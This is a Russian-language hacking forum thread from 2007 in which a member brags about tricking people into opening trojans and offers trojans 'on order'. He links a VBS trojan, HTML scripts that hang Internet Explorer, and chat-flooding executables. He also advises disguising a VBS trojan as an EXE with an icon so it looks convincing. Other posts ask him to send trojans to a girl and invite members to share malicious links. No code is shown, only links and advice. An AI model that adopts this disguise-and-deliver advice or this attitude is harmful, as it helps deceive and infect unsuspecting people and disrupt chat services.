Форум группы ГЕНОЦИД

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Форум группы ГЕНОЦИД » ФОРУМ "ГЕНОЦИД" » ВЗЛОМ и ЗАЩИТА!


ВЗЛОМ и ЗАЩИТА!

Сообщений 1 страница 21 из 21

1

В етоМ раЗдеЛе поПытАюсь ОбьЯсНить кОе чТо по ВзЛому и ЗаЩите коМпьЮтерА.......

0

2

С чеГо ж наЧать..... наЧну навеРное с ПроСтоГо.....  ВТюХиваНИе тРоЯнА)) ТроЯны СдеЛаю сАм, лИшЬ рассКажу каК иХ праВУильНо вТюХиваТь))
( Для любознательныйх - Троян, ето некое подобие вируса, но трояны которые предоставлю я ,будут действовать сразу, и на 100% )
ГОВОРЮ СРАЗУ - НЕ СТРЕМАЙТЕСЬ ВЫ ИХ ТАК! Когда вы скачиваете вредоносную программу, она не заражает ваш компьютер ( имеются ввиду трояны , но вирусы совсем другое дело ), а ЦеПанЁт каМп оНа ТоКа тоГда коГда вЫ отКроете тРояН ( 2 раза левой кнопкой мыши  :)  )!!!!!

0

3

Добрый ты человек ;)

0

4

Бестия написал(а):

Добрый ты человек

СпасибА)) Я знаЮ  :lol:

0

5

Принимаю заказы на трояны...... Хотите, чтоб у вашего нудруга выдало окно в котором написано " Ты лох " и была лишь одна кнопка " ОК " ?  Тогда вам понадобятся именно VBS скрипты!
А..... совсем забыл..... есЛи у лоХа неТу антивиРуса еГо моЖно немНого поЖмуРить оБыЧныМи  HTML скРиптаМИ!!! Да,да! А дядюшка Билл говорил нам что в ЕкСпЛорЕре неТу дЫр, и еГо нерЕаЛьно заГлюЧить..... уБедИтесь саМи что моЖно. Как-то у меня был сайтеЦ.... нА нЁм я РубИл веБмиНи и щаС руБлю...... но я не об етом....  Я на етОт хосТинг ( наРод.маТьегОВёБ ) выЛожиЛ скРипТы наПисаныЕ мНой и дОкаЗыываЮщиЕ чтО ЕксПлоРер - глючится!!!!

Итак скрипты: ( моЖете сПокойно заХодиТь на Них они не НесУт ниКаКоЙ уГроЗы и откЛючаЮтся чеРез CTRL + ALT + DEL )

wwwsender-ua.narod.ru/zestokiy.htm
wwwsender-ua.narod.ru/skript.htm
wwwsender-ua.narod.ru/probel.htm
wwwsender-ua.narod.ru/flood.html
wwwsender-ua.narod.ru/flayer.html

Как видите гЛючаТ екСпЛорЕр но неЗначиТельно.....

Отредактировано Влад (2007-05-05 14:27:38)

0

6

Теперь перейдём к серйозныМ шТукаМ.....
Про сОздаНие VBS я расскаЗывать не буДу иБо ето дОлго и НудНо.....
Я соЗдал нескалько VBS-инок разного уровня сложности, и угрозы.
ВНИМАНИЕ!! ЕТИ ФАЙЛЫ VBS МОЖЕТЕ СОХРАНИТЬ, НО НИКОГДА НЕ ОТКРЫВАЙТЕ У СЕБЯ НА КОМПЬЮТЕРЕ
WWWSENDER-UA.NAROD.RU/5.VBS    -- НЕ ОТКРЫВАТЬ НА СВОЁМ КОМПЕ!!! МОЖНО СОХРАНИТЬ!

Ето троян.....
Степень его сложности гдето 4-5 по 12-и бальной шкале..... но поверьте, что етоГо хваТит чтоБ От зЛосТи раЗбиТь МоНитоР таБуРетКой))

За более сложными троянами стучите в асю.

Но ето есче не всё.... многи люди не захотят открывать файл с таким стрЁмнЫм раСшыРением.....
ТогДа я ДоДумаЛ вОтЪ дО чеГо....
НаРЫл в Нете ПрОграМку котораЯ сДелаНа дЛя раБоты с РееСтроВыми коМанДами. И оказалось что она умеет превращать VBS в EXE.... Следовательно, exe вызывает меньше подозрения, + если прилипить .ICO картинку будет вОобще убеДитеЛьно.

ЗЫ: Програмку для переделки VBS в EXE моЖна  вЗять у меНя... сТуЧите в асю... ПроСто вуПадЛо выКлаДываТь на ХосТинг.... ОтКрыТая всЁже....

0

7

:D  Вспомнил..... коГдато наШел ЛоХа коТорый ПовЕлСя на етот МуЛьтик.... ГляНьте ..... ВЫ БЫ ПОВЕЛИСЬ?

wwwsender-ua.narod.ru/wind.swf

0

8

Привет салаги!!! :bye:

0

9

HA-HA prokolno vu zdes9i visite ggg :friends:

0

10

МЫ Не САЛАГИ - МЫ СУППЕР МЕГА ХАЦКЕРЫ))  :big_boss:

0

11

пРИвЕТ АлАСтОР!))

0

12

дОбРО пОЖАлОВАтЬ ТУдА ГдЕ зА МАтЫ НЕ СтАВЯТ бАнА НАх))

0

13

tro9in4iki tro9in4iki coool oroginal6no :to_babruysk:

0

14

еСЛИ У КОГО еСтЬ КАкИЕ ВрЕдОНОСнЫе ССЫлОчкИ, ВыЛАжЫВАЙтЕ СЮдА))

0

15

мда... убойный мультик. а главное - устрашающий... ууу...

0

16

бля... почему иногда получается не так, как того хотелось бы? нужно ловить момент, иначе мы останемся стоять на своих местах, что не есть хорошо...
ёклмн   ёпрст   Бляйхерд

0

17

Простите за ссылочкИ)) Я немНого оПечатаЛся, но я отРедакТировал, и теперЬ онИ РабОтаЮт))

0

18

ТакС..... заЩита.....

ЗаЩиТа сЦуКо сКучНая и НеИнтЕресНая...... но она НУЖНА))

1) Включите БренДмаУер
2) Если еСть " КасПерСкий " то ОТкЛючиТе БреНдмаУер)) и вуЫбеРите БреНдмаУер касПерСкого....
3) КАСПЕРСКИЙ обяЗатеЛьно......

Вот и вСё))

0

19

Влад, пошли Кате пару троянов, или вирусов......Поржом :rofl:

НЕТ

Отредактировано Влад (2007-05-21 15:26:46)

0

20

ТА ОТЦЕПИСЬ ТЫ НАКОНЕЦ ОТ НЕЁ..... Я ТРОЯНЫ ДАЛ.... ЕСЛИ ХОШ, ШЛИ.....

0

21

О)) Вспомнил..... когда был малой совсем, любил флудить чаты.... Особенно Галу и Бизар. Хотя на остальных тоже отрывался.... Когдато был такой чатлан " ВаЗбуЖдЁнИаПасЕн " он написал простенькую, но классную програмку для флуда чата..... и мы ей бомбили, а потом ошибку устранили админы Галы, и приходилось вручную флудить....

█████Ф█████Л█████У█████Д█████
█████Ф█████Л█████У█████Д█████
█████Ф█████Л█████У█████Д█████
█████Ф█████Л█████У█████Д█████
█████Ф█████Л█████У█████Д█████
█████Ф█████Л█████У█████Д█████                   И никто даже не прикидывает,
█████Ф█████Л█████У█████Д█████                   что ето вполне нормальные символы,
█████Ф█████Л█████У█████Д█████                   которые откроются где угодно...
█████Ф█████Л█████У█████Д█████
█████Ф█████Л█████У█████Д█████
█████Ф█████Л█████У█████Д█████
█████Ф█████Л█████У█████Д█████

И так зафлужывали весь чат, и один разок даже положили его..... 2 часа не пахал...))  :rofl:
Вскоре набралась команда из человек так 20-и и админы уже ничё не могли сделать))

А...... совсем забыл.... у меня всегда была мечта, ЧтОБ буКвы ПрЫгаЛи, А мОзОлИ на МиЗинЦе иЗЗа ШиФта Не НажИмаТь, ПоеТому ВчЕра я НаПиСал проГрамКу " СкаКалКа 1.0 "..... заЦениТе коРоче...... сКаКалка + всё Что НуЖно Для фЛуда чаТов: ( щас дам 3 ссылки, но потом усчё выложу софтину )

http://www.geno-cide.narod.ru/hackerstvo/GalaFuck.exe
http://www.geno-cide.narod.ru/hackerstvo/Skakalka.exe      --- удалено, по причине тупизны народ.ру
http://www.geno-cide.narod.ru/hackerstv … looder.exe

Но нада есчё прокси..... но про ето потом....

0


Вы здесь » Форум группы ГЕНОЦИД » ФОРУМ "ГЕНОЦИД" » ВЗЛОМ и ЗАЩИТА!